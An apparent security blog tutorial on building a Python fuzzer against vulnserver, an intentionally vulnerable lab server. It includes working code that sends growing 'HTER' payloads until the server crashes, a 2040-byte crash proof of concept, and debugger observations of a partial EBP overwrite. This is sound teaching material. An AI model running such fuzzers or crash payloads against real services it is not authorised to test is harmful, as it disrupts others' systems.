Monday, January 20, 2014

Fuzzing vulnserver with Python

A request came in from the forums asking about creating a custom fuzzer in Python. It's simple enough, but for posterity let's walk through the process.


If we examine the kinds of input Peach supplied to vulnserver when we fuzzed the HTER command in a previous post, we see that it basically threw junk input of varying sizes at the server. As a very rough generalization, it keeps increasing the amount of junk to see whether the program crashes. Fuzzing is obviously a lot more complicated and nuanced than this, so check out this book or these links for further reading.

Using Python to Fuzz

OK, let's try to roll our own fuzzer in Python for the HTER command. If we recall the StateModel we created in our Peach Pit, the format of the HTER protocol was:
  1. Receive some data
  2. Send the HTER command with our input
  3. Receive some data

With this in mind, we know enough to go about creating our fuzzer in Python. The general flow is going to be:
  1. Create a connection to vulnserver
  2. Receive the banner from vulnserver, i.e. "Welcome to Vulnerable Server..."
  3. Send our fuzzed data in ever increasing amounts, i.e. "HTER <fuzzed input>"
  4. Receive the response from vulnserver, i.e. "HTER RUNNING FINE"
  5. Increase the amount of fuzzed input
  6. Close the connection to vulnserver
  7. Go back to step 1
  8. If we can't connect to vulnserver, we can guess that the previous input crashed it and print a message
Here's what this looks like in code:
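The following is an added example written for this page, not the script from the original post: it implements the eight steps above as a length-stepping fuzzer, and the same `send_once` helper doubles as the single-shot proof of concept discussed below. The host, port, the 10-byte step and the 5000-byte ceiling are assumptions; the `sender` parameter exists only so the loop can be exercised without a live server.

```python
"""Length-stepping fuzzer for vulnserver's HTER command (added example)."""
import socket
import sys

HOST, PORT = "127.0.0.1", 9999   # assumed: vulnserver listening on its default port


def build_payload(size):
    """The HTER command followed by `size` bytes of 'A'."""
    return b"HTER " + b"A" * size


def send_once(host, port, payload, timeout=5.0):
    """One iteration: connect, read the banner, send the payload, read the reply.

    Returns the reply bytes on success, b"" if the server accepted the data but
    never answered (reset or timeout, so this payload is the suspect), and None
    if the connection itself failed (so the previous payload is the suspect).
    """
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None
    with s:
        try:
            s.recv(1024)                      # "Welcome to Vulnerable Server..."
            s.sendall(payload)
            return s.recv(1024)               # normally b"HTER RUNNING FINE"
        except OSError:                       # reset or timeout mid-request
            return b""


def fuzz(host, port, start=10, step=10, limit=5000, sender=send_once):
    """Grow the payload by `step` bytes per connection until the server stops
    answering. Returns (suspect_size, reason); suspect_size is None when the
    server was never reachable or `limit` was hit without a crash."""
    last_ok, size = None, start
    while size <= limit:
        reply = sender(host, port, build_payload(size))
        if reply is None:
            return last_ok, "connection refused"
        if reply == b"":
            return size, "no reply"
        print("%5d bytes -> %s" % (size, reply.strip().decode(errors="replace")))
        last_ok, size = size, size + step
    return None, "limit reached"


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else HOST
    suspect, why = fuzz(host, PORT)
    print("suspect size: %s (%s)" % (suspect, why))
```

To reproduce the single 2040-byte case as a proof of concept, call `send_once(HOST, PORT, build_payload(2040))` instead of the loop.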

Here's what the output looks like when running this script against an instance of vulnserver:

And we are greeted with this popup as well:

So we have a good indication that 2040 As will crash vulnserver. Let's turn our fuzzer into a quick proof of concept to test whether 2040 As really do crash it.

Not that complicated, but when we run it we get the popup saying that vulnserver.exe has crashed, so we're on to something.

Viewing the Crash Under a Debugger

Just for fun, let's run vulnserver under Immunity Debugger and see what's going on under the covers when we run our proof of concept. You can get Immunity Debugger from here.
First we'll start Immunity. Then go to File > Open, select vulnserver.exe and click the Open button. This spins up vulnserver but pauses it right before it hits the program entry point. You should see a yellow text box on the bottom right-hand side that says "Paused". Hit F9 or go to Debug > Run to start the program. That yellow text box should now say "Running". Great, now we have vulnserver up and running so we can throw our proof of concept at it. Hopefully we should see some registers light up with As when we run it.
Once we execute our proof of concept, we see at the bottom of Immunity that we've hit an exception.

And if we look at our registers we see that this particular crash didn't reveal anything too interesting.

It looks like we were able to overwrite most of EBP, but we didn't get hold of anything else. Oh well, from here we could try throwing 2030 As, and so on, to see if we get a better result.

Hope this helped.


  1. I like this site for its comprehensive and extensive information, best for programmers and/or students. Thank you for sharing.

  2. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

  3. I faced a lot of problems with this. Fortunately, I have a friend who helped me with it. I think, I need to learn more about it.


  4. I really enjoy reading your article. I wanted to inform you that you have people like me who appreciate your work.



  10. It’s really a cool and useful piece of info.